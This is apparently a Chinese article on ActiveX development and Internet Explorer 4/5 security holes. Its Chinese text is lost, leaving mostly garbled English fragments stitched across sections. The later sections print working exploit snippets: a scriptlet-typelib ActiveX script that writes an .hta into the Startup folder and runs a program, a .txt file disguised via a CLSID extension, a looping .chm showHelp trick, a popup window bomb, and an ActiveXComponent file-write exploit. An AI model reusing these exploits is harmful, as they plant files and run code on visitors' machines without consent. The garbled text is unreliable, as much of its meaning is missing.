IE4.0InternetActiveXIE4.0
HKEY_LOCAL_MACHINE\
SOFTWARE\Microsoft\WindowsCurrentVersion\PoliciesPoliciesRatingsDelRatingsKeyIE4.0
IE
HKEY_LOCAL_MACHINE\Software\Microsoft\Internet
Explorer\Main\UrlTemplate IE1,2,3,4....12 34...,
HKEY_USERS\.DEFAULT\Software\Microsoft\Internet
Explorer DWORDDownload Directory,,C:\My Documents
Outlook Express
Outlook Express
HKEY_CURRENT_USER\Identities{4C44D002-7BCF-11D3-9957-AB53DA238B0C}\Software\Microsoft\Outlook
Express\5.0 windowTitleXX{ }
Outlook Express
HKEY_CURRENT_USER\Identities{4C44D002-7BCF-11D3-9957-AB53DA238B0C}\Software\Microsoft\Outlook
Express\5.0 Store Root
39ActiveX
InternetWEBMicrosoftActiveXActiveXWEBVisual C++Visual
BasicActiveXWEBActiveX
1. ActiveX
1.1. ActiveX
ActiveXMicrosoftCOMComponent Object
ModelInternetActiveXWEBActiveX
1.2. ActiveX
ActiveX
ActiveXActiveX ControlWEBMicrosoft WordActiveXContainerCOM
ActiveXActiveX DocumentWEB BrowserActiveXHTMLMicrosoft
WordMicrosoft Excel
ActiveXActiveX ScriptingActiveXJava
ActiveXActiveX Server FrameworkWEBHTML
Internet ExplorerJavaJava Virtual MachineJava AppletInternet
ExplorerActiveX
1.3. ActiveXJava
ActiveXJavaJavaAppletActiveXActiveXActiveXJavaJavaActiveXCode
Signing
1.4. Internet ExplorerNetscape Navigator
MicrosoftInternet ExplorerActiveXMicrosoftNetscape Navigator?
Plug-InNavigatorActiveXWEB
2. ActiveXInternet
ActiveXOLEControlComponentActiveXCOMInternetWEBScriptPropertyMethodEvent
ActiveXOLEActiveXIUnknown
ActiveXInternet1000ActiveXWINDOWSSYSTEMWindowActiveXMicrosoft
Visual C++VCMFCMicrosoft Foundation ClassesActiveX
InternetInternetActiveX
Persist Data
Internet
3. ActiveXInternet
ActiveXActiveXActiveXFull Frame
Microsoft Office97Microsoft Office BinderMicrosoft WordMicrosoft
ExcelActiveX ActiveXWEBWEB
4. ActiveX
VBScriptMicrosoft JScriptWebActiveXWEB
5. ActiveX
WEBWEBMFCISAPIWEB
6. Visual C++ 5.0ActiveX
VC++ 5.0Internet
MFCATLActiveXActiveX
ISAPIWEB
WinInet Internet
Asynchronous MonikersInternet
ActiveX SDKInternetWin32ActiveX Scripting HostMicrosoft
WebConferencing
6.1. VC5.0ActiveX
VC++5.0ActiveXMFCATLActive Template
LibraryMFCActiveXMFCDLLATLMFCCOMOLEMFCActiveXInternet Explorer
3.0MFC 4.1Internet Explorer 3.0Windows95ActiveXMFC 4.1MFC
MFCActiveXMFC ActiveX Control WizardVCMyName
CMyNameAppCOleControlModuleCOleControlModuleCWinApp
CMyNameCtrlCOleControlCOleControlCWnd
CMyNamePropPageCOlePropertyPageCOlePropPageCDialog
MFCCMyNameCtrlClass Wizard
OCXVCActiveX Test ContainerOLE/COM Object Viewer
6.2. ActiveXWEB
WEBWEBActiveXCode
SigningVC5.0http//www.microsoft.com/intdev/signcode/
WEBActiveXCABCabinetVC5.0ActiveXHTMLOBJECTActiveXVBScriptJScriptActiveXInternet
ExplorerInternet ExplorerActiveX ScriptingActiveXMSChart.OCX"
ID=chart1 WIDTH=400 HEIGHT=200
ALIGN=center>
Object IDActiveX DLLWEBMyClassLogInLogIn
7.3. Visual Basic 6.0
Microsoft19989Visual Basic 6.0BetaVB 6.0VB5.0Internet Explorer
Document Object ModelDOM
Dynamic HTML
VBDHTML
WebClasses
WEBASPWebClassASPVisual Basic IDE ISAPI
8.
InternetWEBActiveXMicrosoftWindows NTInternet Information
ServerActive Server PagesMicrosoft FrontPageInternet
ExplorerInternetActiveX
1. Visual C++[]David J. Kruglinski
2. ActiveX[]Eric TallMark Ginsburg
3. Visual Basic 6.0You Wont Believe What Just Hit the WebJoshua
TrupinMicrosoft Interactive Network DeveloperMIND19988
4. Introduction to ActiveX ControlsMicrosoft Corp.MSDN19988
5. Dynamic HTML and the Big PictureJohn SwensonMSDN
Online199711
6. A Brief Preview of the Visual Basic 5.0 Development
EnvironmentMichael OteyWindows NT Magazine 19974
7. http//www.microsoft.com/MicrosoftMSDNMSJ
8. http//www.ActiveX.comActiveX
9. http//www.Active-X.comActiveX
10. http//www.WinntMag.comWindows NT Magazine
41IE
2000222 by Juan Carlos Garcia Cuartango
Internet Explorer 4.x and 5.x
IE MS Active SetupIE 4.x5.xInternet
MicrosoftMicrosoft
MicrosoftWindowsJuanMicrosoftMicrosoft
bugpatch
IE5.0
Internet Explorer 5.0ActiveX Control "Object for constructing
type libraries for scriptlets"HTMLwebemail!!!
htmIE5ActiveXthe trojan,---Ken
scr.Reset();
scr.Path="C:\\windows\\Start
Menu\\Programs\\StartUp\\allin.hta";
scr.Doc="alert(`Written
by Ken,Visit http://allin.8m.com Please`)
;wsh.Run(`sol.exe`);";
scr.write();
C:\windows\Start Menu\Programs\StartUpallin.hta(Written by Ken
http://allin.8m.com)sol.exe()
IE5ActiveX Scripting
internetActive XDisableDisable
42IE
IE*.TXTHTML,.
HTML,TXT,,REDCRACK,,,TXT,,,HAPPY TIME.,MIME,,html,,TXT,.
,
//JS
43txt
windowswindows.txt
QQ.txtQQ.txt.
{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}HTML.txtQQ.txt.html
HTMLdWindows is configuring the systemPlase do not interrupt
this process.txt
.txt.{3050F4D8-98B5-11CF-BB82-00AA00BDCE0B}.htmlhtml
23322WSCript
WScriptWindows Scripting HostWin98,
/WScript.exec:\WINDOWSWindows Scripting Host
Windows Scripting Host*.vbs
Set so=CreateObject("Scripting.FileSystemObject")
so.GetFile(c:\windows\winipcfg.exe).Copy("e:\winipcfg.exe")
c:\windows\winipcfg.exeGetFileCopyeVBscriptFileSystemObjectregsvr32
scrrun.dll /u
.txt.txtWEBtxt.txt
44IE
function g()
{s=document.URL;
path=s.substr(0,s.lastIndexOf("\\"));
path=unescape(path);
window.showHelp(path+"\\chm1.chm");
setTimeout("g()",50); // if you are on a slow internet
connection you must increase the delay
IE5.Xchmchm
function WindowBomb()
{ var iCounter = 0 // dummy counter while (true)
{window.open("open.htm","CRASHING"+ iCounter,"width=1,
height=1,resizable=no")
{iCounter++ }
kao~IE
45
IE/Outlook4.X-5.Xcom.ms.activeX.ActiveXComponentCNers.COM.HTM
Demo#2-IE5.5/Outlook-com.ms.activeX.
ActiveXComponent
a1=document.applets[0];
fn="CNers.COM.HTM";
doc="s1=\'\\CNers.COM.HTM\';alert(s1);document.
body.innerHTML=s1";
function f1()
{
a1.setProperty('DOC',doc);
}
function f()
{
// The ActiveX classid
cl="{06290BD5-48AA-11D2-8432-006008C3FBFC}";
a1.setCLSID(cl);
a1.createInstance();
setTimeout("a1.setProperty('Path','"+fn+"')",1000);
setTimeout("f1()",1500);
setTimeout("a1.invoke('write',VA);alert('"+fn+" ');",2000);
}
setTimeout("f()",1000)
VA = AR
